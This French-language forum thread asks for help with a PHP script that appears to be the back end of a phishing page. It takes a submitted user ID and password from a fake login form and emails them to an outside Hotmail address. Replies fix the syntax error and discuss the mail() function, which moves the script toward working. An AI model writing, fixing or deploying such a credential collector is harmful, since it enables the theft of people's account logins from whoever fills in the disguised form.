Probléme avec PHP

Bonjour,

<?php

$email=$_POST['UserIDWithoutPrefix'];
$password=$_POST['Password'];

$sujet='les données';
$destinataire='leprince27@hotmail.fr'

mail($destinataire,$sujet,$email,$password);

?>

J'ai beau essayé plusieurs site d'hébergement mais j'ai toujours le probléme a chaque fois que je compile j'ai cette erreur et sa n'envoie rien:

Parse error: syntax error, unexpected T_STRING in ............../index.php on line 9

Merci de votre aide

12 réponses

1. tu aurais pas oublié un point virgule après :

$destinataire='leprince27@hotmail.fr'

????
    1. Excuse-moi d'insister, mais est-ce que ton hébergeur accepte la fonction php mail ? Informe-toi sinon tu risques de bagarrer pendant longtemps !
      1. Bonsoir,
        Manque le point-virgule terminant l'instruction (en gras dans le code ci-dessous)
        $destinataire='leprince27@hotmail.fr';
        1. Merci j'ai corrigé l'erreur mais j'ai toujours le méme probléme !!
          1. Si ton code est rédigé comme ceci :
            <?php
            $email=$_POST['UserIDWithoutPrefix'];
            $password=$_POST['Password'];
            $sujet='les données';
            $destinataire='leprince27@hotmail.fr';

mail($destinataire,$sujet,$email,$password);
            ?>

Alors le problème vient d'ailleurs... Y-a-t'il du code PHP avant ou après ce script d'envoi de mail ?
            1. Y a juste une page html avec des cases , j'ai essayé d'envoyer les données dans un fichier et sa marche reste le probléme avec la fonction mal
              1. syntaxe de la fonction mail :

mail ( string $to , string $subject , string $message [, string $additional_headers [, string $additional_parameters ]] )

$to chez toi est $destinataire -> ok
                $subject chez toi est $sujet ok

$additional_headers chez toi est ? quelle valeur est retournée ?
                et additional parameter ??? quelle valeur est retournée ?
                1. Les crochets, ça veut dire que le paramètre est optionnel :)
                  En l'occurrence, il ne les donne pas.
                2. c'est optionnel pour autant que le php.ini ait l'adresse 'from ' qui est obligatoire dans quelques situations
              2. Il manque le point virgule après $destinataire='leprince27@hotmail.fr'
                1. As-tu vérifié ce que tu recevait dans tes $_POST ? print_r($_POST); ?